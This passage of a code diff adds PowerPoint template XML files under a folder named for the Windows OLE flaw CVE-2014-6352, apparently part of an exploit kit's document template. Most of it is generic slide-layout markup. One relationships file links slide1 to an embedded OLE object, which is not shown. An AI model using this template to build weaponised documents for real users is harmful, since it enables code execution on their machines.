noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Slide Number Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="twoObj" preserve="1"><p:cSld name="Two Content"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Content Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="4648200" y="1600200"/><a:ext cx="4038600" cy="4525963"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="2800"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2400"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2000"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="1800"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="1800"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="1800"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="1800"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="1800"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="1800"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="titleOnly" preserve="1"><p:cSld name="Title Only"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Date Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Footer Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Slide Number Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="blank" preserve="1"><p:cSld name="Blank"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Date Placeholder 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Footer Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Slide Number Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="objTx" preserve="1"><p:cSld name="Content with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="273050"/><a:ext cx="3008313" cy="1162050"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Content Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="3575050" y="273050"/><a:ext cx="5111750" cy="5853113"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p><a:p><a:pPr lvl="1"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Second level</a:t></a:r></a:p><a:p><a:pPr lvl="2"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Third level</a:t></a:r></a:p><a:p><a:pPr lvl="3"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fourth level</a:t></a:r></a:p><a:p><a:pPr lvl="4"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Fifth level</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="457200" y="1435100"/><a:ext cx="3008313" cy="4691063"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="picTx" preserve="1"><p:cSld name="Picture with Caption"><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:sp><p:nvSpPr><p:cNvPr id="2" name="Title 1"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="title"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="4800600"/><a:ext cx="5486400" cy="566738"/></a:xfrm></p:spPr><p:txBody><a:bodyPr anchor="b"/><a:lstStyle><a:lvl1pPr algn="l"><a:defRPr sz="2000" b="1"/></a:lvl1pPr></a:lstStyle><a:p><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master title style</a:t></a:r><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="3" name="Picture Placeholder 2"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="pic" idx="1"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="612775"/><a:ext cx="5486400" cy="4114800"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="3200"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="2800"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="2400"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="2000"/></a:lvl9pPr></a:lstStyle><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="4" name="Text Placeholder 3"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="body" sz="half" idx="2"/></p:nvPr></p:nvSpPr><p:spPr><a:xfrm><a:off x="1792288" y="5367338"/><a:ext cx="5486400" cy="804862"/></a:xfrm></p:spPr><p:txBody><a:bodyPr/><a:lstStyle><a:lvl1pPr marL="0" indent="0"><a:buNone/><a:defRPr sz="1400"/></a:lvl1pPr><a:lvl2pPr marL="457200" indent="0"><a:buNone/><a:defRPr sz="1200"/></a:lvl2pPr><a:lvl3pPr marL="914400" indent="0"><a:buNone/><a:defRPr sz="1000"/></a:lvl3pPr><a:lvl4pPr marL="1371600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl4pPr><a:lvl5pPr marL="1828800" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl5pPr><a:lvl6pPr marL="2286000" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl6pPr><a:lvl7pPr marL="2743200" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl7pPr><a:lvl8pPr marL="3200400" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl8pPr><a:lvl9pPr marL="3657600" indent="0"><a:buNone/><a:defRPr sz="900"/></a:lvl9pPr></a:lstStyle><a:p><a:pPr lvl="0"/><a:r><a:rPr lang="en-US" smtClean="0"/><a:t>Click to edit Master text styles</a:t></a:r></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="5" name="Date Placeholder 4"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="dt" sz="half" idx="10"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{A3E2BFEF-B464-43B7-BACB-B80E2ED36959}" type="datetimeFigureOut"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>11/12/2014</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="6" name="Footer Placeholder 5"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="ftr" sz="quarter" idx="11"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp><p:sp><p:nvSpPr><p:cNvPr id="7" name="Slide Number Placeholder 6"/><p:cNvSpPr><a:spLocks noGrp="1"/></p:cNvSpPr><p:nvPr><p:ph type="sldNum" sz="quarter" idx="12"/></p:nvPr></p:nvSpPr><p:spPr/><p:txBody><a:bodyPr/><a:lstStyle/><a:p><a:fld id="{FDE0A223-AA89-463D-95C0-64ABE7403E02}" type="slidenum"><a:rPr lang="en-US" smtClean="0"/><a:pPr/><a:t>‹#›</a:t></a:fld><a:endParaRPr lang="en-US"/></a:p></p:txBody></p:sp></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr></p:sldLayout>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.wmf"/></Relationships>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}"/>
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml
--- a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml
@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
